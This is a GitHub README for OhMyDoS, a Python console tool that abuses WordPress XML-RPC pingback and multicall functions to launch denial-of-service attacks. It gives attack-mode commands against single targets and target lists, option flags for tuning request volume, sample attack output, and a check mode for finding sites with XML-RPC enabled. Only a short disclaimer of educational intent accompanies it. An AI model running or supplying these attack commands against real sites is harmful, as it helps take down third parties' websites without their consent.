⛔ OhMyDoS

OhMyDos is a python console application abusing Wordpress API called XML-RPC and its functions system.multicall and pingback.ping with aim of Denial-of-Service.

📝 Pre-requisites

Python3.X (download)
library called fake-useragent (project)
- $ pip install fake-useragent

⚡ Usage

OhMyDos provides 2 operation modes check and attack with ability to automate targeting of multiple Wordpress websites.

Attack Mode

Option Flags

Flags	Description
-e	Number of entries per one `system.multicall` (per one POST request)
-r	Number of POST request per target

Single Target

$ python3 OhMyDoS.py attack http://pingback.com http://example.com

    ▒█████   ██░ ██     ███▄ ▄███▓▓██   ██▓   ▓█████▄  ▒█████    ██████ 
    ▒██▒  ██▒▓██░ ██▒   ▓██▒▀█▀ ██▒ ▒██  ██▒   ▒██▀ ██▌▒██▒  ██▒▒██    ▒ 
    ▒██░  ██▒▒██▀▀██░   ▓██    ▓██░  ▒██ ██░   ░██   █▌▒██░  ██▒░ ▓██▄   
    ▒██   ██░░▓█ ░██    ▒██    ▒██   ░ ▐██▓░   ░▓█▄   ▌▒██   ██░  ▒   ██▒
    ░ ████▓▒░░▓█▒░██▓   ▒██▒   ░██▒  ░ ██▒▓░   ░▒████▓ ░ ████▓▒░▒██████▒▒
    ░ ▒░▒░▒░  ▒ ░░▒░▒   ░ ▒░   ░  ░   ██▒▒▒     ▒▒▓  ▒ ░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░
    ░ ▒ ▒░  ▒ ░▒░ ░   ░  ░      ░ ▓██ ░▒░     ░ ▒  ▒   ░ ▒ ▒░ ░ ░▒  ░ ░
      ░ ░     ░  ░  ░   ░      ░    ▒ ▒         ░    ░   ░   ▒     ░  ░  
    
----------------------------------------------------------------------------
[>] Target : http://example.com
[>] Building 2000 pingback calls per one request
[>] Request size: 243.649 kB

[~] Starting attack, press CTRL+C to stop ...
[>] Requests sent : 159

[~] Attack interrupted by keypress

Multiple Targets

$ python3 OhMyDoS.py attack http://pingback.com targets.txt

Check Mode

Single Target

$ python3 OhMyDoS.py check http://example.com

    ▒█████   ██░ ██     ███▄ ▄███▓▓██   ██▓   ▓█████▄  ▒█████    ██████ 
    ▒██▒  ██▒▓██░ ██▒   ▓██▒▀█▀ ██▒ ▒██  ██▒   ▒██▀ ██▌▒██▒  ██▒▒██    ▒ 
    ▒██░  ██▒▒██▀▀██░   ▓██    ▓██░  ▒██ ██░   ░██   █▌▒██░  ██▒░ ▓██▄   
    ▒██   ██░░▓█ ░██    ▒██    ▒██   ░ ▐██▓░   ░▓█▄   ▌▒██   ██░  ▒   ██▒
    ░ ████▓▒░░▓█▒░██▓   ▒██▒   ░██▒  ░ ██▒▓░   ░▒████▓ ░ ████▓▒░▒██████▒▒
    ░ ▒░▒░▒░  ▒ ░░▒░▒   ░ ▒░   ░  ░   ██▒▒▒     ▒▒▓  ▒ ░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░
    ░ ▒ ▒░  ▒ ░▒░ ░   ░  ░      ░ ▓██ ░▒░     ░ ▒  ▒   ░ ▒ ▒░ ░ ░▒  ░ ░
      ░ ░     ░  ░  ░   ░      ░    ▒ ▒         ░    ░   ░   ▒     ░  ░  
    
----------------------------------------------------------------------------
[>] Checking if XML-RPC for http://example.com is enabled ...
[>] XML-RPC enabled.

Multiple Targets

$ python3 OhMyDoS.py check targets.txt

📋 To-Do List

Task	Status
Reimplement random User Agent generation

📮 Resources

WordPress DoS: Rediscovering an Unpatched 0-Day (blog post)
- PoC : https://github.com/roddux/wordpress-dos-poc (this project is build on the top of this PoC)
Exploiting the xmlrpc.php on all WordPress versions (blog post)

📐 Testing Environment Set Up

How To Install WordPress with LAMP (link)
WordPress in a Docker container (link)

⚠️ Disclaimer

This tool was developed solely for educational purposes only and the author of this tool is no way responsible for any misuse.

swagkarna / OhMyDoS

⛔ OhMyDoS

📝 Pre-requisites

⚡ Usage

Attack Mode

Option Flags

Single Target

Multiple Targets

Check Mode

Single Target

Multiple Targets

📋 To-Do List

📮 Resources

📐 Testing Environment Set Up

⚠️ Disclaimer

About

Languages